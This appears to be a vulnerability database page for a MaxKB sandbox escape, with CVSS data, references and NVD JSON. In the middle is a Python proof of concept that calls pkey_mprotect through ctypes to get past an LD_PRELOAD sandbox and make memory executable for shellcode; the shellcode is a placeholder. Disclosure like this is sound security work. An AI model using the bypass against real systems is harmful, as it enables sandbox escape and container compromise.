CVE-2026-39421

Description

MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a sandbox escape vulnerability in the ToolExecutor component. By leveraging Python's ctypes library to execute raw system calls, an authenticated attacker with workspace privileges can bypass the LD_PRELOAD-based sandbox.so module to achieve arbitrary code execution via direct kernel system calls, enabling full network exfiltration and container compromise. The library intercepts critical standard system functions such as execve, system, connect, and open. It also intercepts mprotect to prevent PROT_EXEC (executable memory) allocations within the sandboxed Python processes, but pkey_mprotect is not blocked. This issue has been fixed in version 2.8.0.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:* - VULNERABLE

MaxKB <= 2.7.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-39421
# This PoC demonstrates bypassing the LD_PRELOAD sandbox using ctypes and pkey_mprotect.
import ctypes
import sys

# Constants for x86_64 architecture
SYS_pkey_mprotect = 330
PROT_READ = 0x1
PROT_WRITE = 0x2
PROT_EXEC = 0x4

# Shellcode placeholder (e.g., execve /bin/sh)
shellcode = bytes(b"\x90\x90\x90\x90") # Replace with actual shellcode

# Allocate memory buffer
buffer_size = len(shellcode)
# Use ctypes to create a writable buffer
libc = ctypes.CDLL(None)
addr = libc.valloc(buffer_size)
addr = ctypes.cast(addr, ctypes.c_void_p)

# Write shellcode to memory
ctypes.memmove(addr, shellcode, buffer_size)

# Bypass sandbox by using raw syscall for pkey_mprotect instead of mprotect
# Arguments: addr, size, prot, pkey (ignored usually if default)
# PROT_READ | PROT_WRITE | PROT_EXEC = 7
print(f"[*] Attempting to change memory protection at {hex(addr.value)}...")

# Execute raw system call via libc syscall wrapper
# Note: syscall number depends on architecture (330 for pkey_mprotect on x86_64)
result = libc.syscall(SYS_pkey_mprotect, addr.value, buffer_size, PROT_READ | PROT_WRITE | PROT_EXEC, 0)

if result == 0:
    print("[+] Memory protection changed successfully! Bypass successful.")
    # Cast to function pointer and execute (Theoretical execution)
    func = ctypes.cast(addr, ctypes.CFUNCTYPE(None))
    print("[!] Executing shellcode...")
    # func() # Uncomment to actually execute
else:
    print(f"[-] Failed to change protection: {result}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39421
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39421
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39421/
[4] VulDB https://vuldb.com/cve/CVE-2026-39421
[5] https://github.com/1Panel-dev/MaxKB/commit/479701a4d2e6059506bad0057a66bed91abb5aef
[6] https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0
[7] https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-9c6w-j7w5-3gf7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39421", "sourceIdentifier": "[email protected]", "published": "2026-04-14T01:16:04.690", "lastModified": "2026-04-20T17:35:05.397", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a sandbox escape vulnerability in the ToolExecutor component. By leveraging Python's ctypes library to execute raw system calls, an authenticated attacker with workspace privileges can bypass the LD_PRELOAD-based sandbox.so module to achieve arbitrary code execution via direct kernel system calls, enabling full network exfiltration and container compromise. The library intercepts critical standard system functions such as execve, system, connect, and open. It also intercepts mprotect to prevent PROT_EXEC (executable memory) allocations within the sandboxed Python processes, but pkey_mprotect is not blocked. This issue has been fixed in version 2.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:maxkb:maxkb:*:*:*:*:-:*:*:*", "versionEndExcluding": "2.8.0", "matchCriteriaId": "8BB376B6-4E9C-4801-9D33-5BF858C857D2"}]}]}], "references": [{"url": "https://github.com/1Panel-dev/MaxKB/commit/479701a4d2e6059506bad0057a66bed91abb5aef", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-9c6w-j7w5-3gf7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}